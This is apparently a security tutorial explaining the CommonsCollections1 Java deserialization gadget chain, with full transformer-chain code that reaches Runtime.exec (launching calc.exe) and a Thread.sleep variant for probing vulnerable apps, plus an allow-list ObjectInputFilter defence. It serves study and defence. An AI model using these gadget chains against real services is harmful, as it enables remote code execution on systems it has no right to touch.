CommonsCollections1 Payload - Java Transformers to Runtime exec() and Thread Sleep
Java Transformers to Runtime exec()
In several places you can find a Java deserialization payload that uses transformers from Apache Commons Collections, like the following one:
```java
import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;

import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.util.Map;
import java.util.HashMap;

public class CommonsCollections1PayloadOnly {
    public static void main(String... args) {
        String[] command = {"calc.exe"};
        final Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class), //(1)
            new InvokerTransformer("getMethod",
                new Class[]{ String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}
            ), //(2)
            new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}
            ), //(3)
            new InvokerTransformer("exec",
                new Class[]{String.class},
                command
            ) //(4)
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        Map map = new HashMap<>();
        Map lazyMap = LazyMap.decorate(map, chainedTransformer);

        //Execute gadgets
        lazyMap.get("anything");
    }
}
```
To follow Java deserialization payloads like this one, the piece to understand is the Java `Transformer` class and its `transform` method.
It is also interesting to know that the payload being executed is equivalent to:
```java
Runtime.getRuntime().exec(new String[]{"calc.exe"});
```
Or, spelled out with the same reflection calls that the chain makes:
```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
```
How
So, how is the first payload presented equivalent to those "simple" one-liners?
First of all, you can notice in the payload that a chain (array) of transforms is created:
```java
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
    //(1) - Get gadget Class (from Runtime class)
    new ConstantTransformer(Runtime.class),

    //(2) - Call from gadget Class (from Runtime class) the function "getMethod" to obtain "getRuntime"
    new InvokerTransformer("getMethod",
        new Class[]{ String.class, Class[].class},
        new Object[]{"getRuntime", new Class[0]}
    ),

    //(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime object
    new InvokerTransformer("invoke",
        new Class[]{Object.class, Object[].class},
        new Object[]{null, new Object[0]}
    ),

    //(4) - Use the Runtime object to call exec with arbitrary commands
    new InvokerTransformer("exec",
        new Class[]{String.class},
        command
    )
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
```
The rest of the payload is what actually runs the chain:
```java
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
lazyMap.get("anything");
```
In the last section of the payload you can see that a Map object is created. Then, the function `decorate` is executed from `LazyMap` with the map object and the chained transformers. From the following code you can see that this will cause the chained transformers to be copied inside the `lazyMap.factory` attribute:
```java
protected LazyMap(Map map, Transformer factory) {
    super(map);
    if (factory == null) {
        throw new IllegalArgumentException("Factory must not be null");
    }
    this.factory = factory;
}
```
Then `lazyMap.get("anything");` is called, which runs this code:
```java
public Object get(Object key) {
    if (map.containsKey(key) == false) {
        Object value = factory.transform(key);
        map.put(key, value);
        return value;
    }
    return map.get(key);
}
```
And this is the code of the `transform` function:
```java
public Object transform(Object object) {
    for (int i = 0; i < iTransformers.length; i++) {
        object = iTransformers[i].transform(object);
    }
    return object;
}
```
So, remember that inside `factory` we had saved `chainedTransformer`, and inside the `transform` function we go through all those chained transformers, executing one after another. The funny thing is that each transformer uses `object` as input, and `object` is the output of the last transformer executed. Therefore, all the transforms are chained, executing the malicious payload.
Summary
In the end, because of how lazyMap manages the chained transformers inside the `get` method, it is as if we were executing the following code:
```java
String[] command = {"calc.exe"}; // same command array as in the payload above
Object value = "something";

value = new ConstantTransformer(Runtime.class).transform(value); //(1)

value = new InvokerTransformer("getMethod",
        new Class[]{ String.class, Class[].class},
        new Object[]{"getRuntime", null}
    ).transform(value); //(2)

value = new InvokerTransformer("invoke",
        new Class[]{Object.class, Object[].class},
        new Object[]{null, new Object[0]}
    ).transform(value); //(3)

value = new InvokerTransformer("exec",
        new Class[]{String.class},
        command
    ).transform(value); //(4)
```
Note how `value` is the input of each transform and the output of the previous transform, allowing the execution of a one-liner:
```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
```
This explains the gadgets used by the CommonsCollections1 payload, but not how their execution starts. As you can see in [ysoserial](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), the payload is carried inside an `AnnotationInvocationHandler` object, because when that object is deserialized it invokes `payload.get()`, which executes the whole payload.
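The chain above only runs if the receiving stream is willing to instantiate classes such as `LazyMap`, `InvokerTransformer` and `AnnotationInvocationHandler`. The following added example (not from the original page or from ysoserial) shows an allow-list `ObjectInputFilter` (Java 9+) that rejects any unexpected class before its `readObject()` can run. `AllowListDeserialization`, `StandInGadget` and the allow-listed types are assumptions made for the demonstration; `StandInGadget` is a constructed stand-in so the example runs without Commons Collections on the classpath.

```java
import java.io.*;
import java.util.HashMap;
import java.util.Map;

public class AllowListDeserialization {

    // Constructed stand-in for a gadget class such as LazyMap or
    // AnnotationInvocationHandler: its readObject() has a side effect.
    static class StandInGadget implements Serializable {
        private static final long serialVersionUID = 1L;
        static boolean readObjectRan = false;

        private void readObject(ObjectInputStream in)
                throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            readObjectRan = true; // a real gadget would start its chain here
        }
    }

    // Allow-list: only the types this (hypothetical) endpoint expects.
    // Patterns are tried left to right; the final "!*" rejects everything else.
    // The limits bound nesting depth, reference count and array sizes.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=5;maxrefs=100;maxarray=1000;"
            + "java.util.HashMap;java.util.Map$Entry;"
            + "java.lang.String;java.lang.Integer;java.lang.Number;!*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buf)) {
            out.writeObject(o);
        }
        return buf.toByteArray();
    }

    static Object safeDeserialize(byte[] data)
            throws IOException, ClassNotFoundException {
        try (ObjectInputStream in =
                     new ObjectInputStream(new ByteArrayInputStream(data))) {
            // Must be installed before the first readObject() call.
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Expected input: a plain map of strings to integers.
        Map<String, Integer> expected = new HashMap<>();
        expected.put("retries", 3);
        System.out.println("allowed:  " + safeDeserialize(serialize(expected)));

        // Unexpected input: a map carrying a class that is not on the allow-list.
        Map<String, Object> hostile = new HashMap<>();
        hostile.put("anything", new StandInGadget());
        try {
            safeDeserialize(serialize(hostile));
        } catch (InvalidClassException e) {
            // The filter rejects the class descriptor before instantiation.
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("gadget readObject ran: " + StandInGadget.readObjectRan);
    }
}
```

The second call fails with an `InvalidClassException` and `readObjectRan` stays `false`, because the filter is consulted when the class descriptor is read, before the object is created. Commons Collections 3.2.2 and later additionally refuse to deserialize `InvokerTransformer` unless unsafe serialization is explicitly re-enabled.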
Java Thread Sleep
If the web application is vulnerable, the following payload makes it sleep (7 seconds here) instead of running a command:
```java
import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;

import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Map;
import java.util.HashMap;

public class CommonsCollections1Sleep {
    public static void main(String... args) {
        final Transformer[] transformers = new Transformer[]{
            // Start from Thread.class
            new ConstantTransformer(Thread.class),
            // Thread.class.getMethod("sleep", long.class)
            new InvokerTransformer("getMethod",
                new Class[]{
                    String.class, Class[].class
                },
                new Object[]{
                    "sleep", new Class[]{Long.TYPE}
                }),
            // sleepMethod.invoke(null, 7000L)
            new InvokerTransformer("invoke",
                new Class[]{
                    Object.class, Object[].class
                },
                new Object[]{
                    null, new Object[] {7000L}
                }),
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        Map map = new HashMap<>();
        Map lazyMap = LazyMap.decorate(map, chainedTransformer);

        //Execute gadgets
        lazyMap.get("anything");
    }
}
```
More Gadgets
You can find more gadgets here: https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html